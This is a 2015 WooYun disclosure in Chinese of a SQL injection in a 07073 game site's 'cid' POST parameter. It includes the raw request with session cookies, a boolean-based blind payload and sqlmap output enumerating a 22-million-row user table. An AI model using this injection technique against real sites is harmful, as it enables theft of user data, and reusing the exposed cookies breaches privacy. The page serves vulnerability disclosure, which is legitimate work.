当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102290

漏洞标题:07073游戏某站SQL注入第四次影响用户数据

相关厂商:07073.com

漏洞作者: BMa

提交时间:2015-03-19 12:51

修复时间:2015-05-03 13:16

公开时间:2015-05-03 13:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-19: 细节已通知厂商并且等待厂商处理中
2015-03-19: 厂商已经确认,细节仅向厂商公开
2015-03-29: 细节向核心白帽子及相关领域专家公开
2015-04-08: 细节向普通白帽子公开
2015-04-18: 细节向实习白帽子公开
2015-05-03: 细节向公众公开

简要描述:

07073游戏某站SQL注入第四次影响22044669用户数据
很不好意思,又来了,但反过来说,我来提出问题总比其他人拖走数据库好得多
我从不脱人家裤子,也不窥探,社会主义好青年

详细说明:

company.07073.com


POST /click HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://company.07073.com
Referer: http://company.07073.com/8729.html
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
Host: company.07073.com
Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22e901c1f669d2d643c4ee936468d6509c%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%22125.78.248.83%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Windows+NT+6.3%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F33.0.1750.170+Safari%2F537.36+%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1426734513%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D30bfde05526ae61ba411a0babcd6cadf; CNZZDATA30095910=cnzz_eid%3D1437763485-1426487774-http%253A%252F%252Fwww.07073.com%252F%26ntime%3D1426725501; CNZZDATA30078424=cnzz_eid%3D1529681690-1426490357-http%253A%252F%252Fwww.07073.com%252F%26ntime%3D1426729241; DedeUserID=22166706; DedeUserID__ckMd5=195d5f4d055945af; DedeUsername=bma123; DedeUsername__ckMd5=ed597bcceffae423; loginState=1; loginName=bma123; www07073=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22b2315a9a9db5140b17c8b734a0bfde8e%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22183.57.47.59%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A72%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%3B+rv%3A36.0%29+Gecko%2F20100101+Firefox%2F36.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1426729229%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Dcdfc00377f4a29347793a5622bcc27e9; PHPSESSID=98946e97e1d599248d8ec8b875b9a45e; from_url=http%3A//v.07073.com/
Accept-Encoding: gzip, deflate
Content-Length: 19
Content-Type: application/x-www-form-urlencoded
cid=1


1.jpg


2.jpg


3.jpg


4.jpg


current user:    'amdbuser@%'
current database: 'kf07073'
[11:46:05] [INFO] testing connection to the target URL
you provided a HTTP Cookie header value. The target URL provided its own cookies
within the HTTP Set-Cookie header which intersect with yours. Do you want to me
rge them in futher requests? [Y/n] y
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: cid (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cid=1 AND 5900=5900
---
[11:46:07] [INFO] testing MySQL
[11:46:07] [INFO] confirming MySQL
[11:46:07] [INFO] the back-end DBMS is MySQL
web server operating system: Windows NT 4.0
back-end DBMS: MySQL >= 5.0.0
[11:46:07] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[11:46:07] [INFO] retrieved: 22044669
Database: bbs073
+------------+---------+
| Table | Entries |
+------------+---------+
| uc_members | 22044669 |
+------------+---------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 BMa@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-03-19 13:15

厂商回复:

感谢提供漏洞信息

最新状态:

暂无


漏洞评价:

评论

  1. 2015-03-19 12:55 | 黄口小儿 ( 普通白帽子 | Rank:163 漏洞数:49 | coffeesafe的号子)

    mark

  2. 2015-03-19 13:00 | 天地不仁 以万物为刍狗 ( 普通白帽子 | Rank:977 漏洞数:264 | 天地本不仁 万物为刍狗)

    系列啊。。。。。

  3. 2015-03-19 13:02 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    下一个将走小流程

  4. 2015-03-19 14:20 | luwikes ( 普通白帽子 | Rank:512 漏洞数:77 | 潜心学习~~~)

    @浩天 不能因为人家报的多就小流程啊,求看漏洞内容

  5. 2015-03-19 16:14 | greg.wu ( 普通白帽子 | Rank:815 漏洞数:99 | 打酱油的~)

    刷的这么明显。。。

  6. 2015-03-19 16:22 | BMa ( 普通白帽子 | Rank:1776 漏洞数:200 )

    每一个都不同的站,不同的点,但都能导出用户库....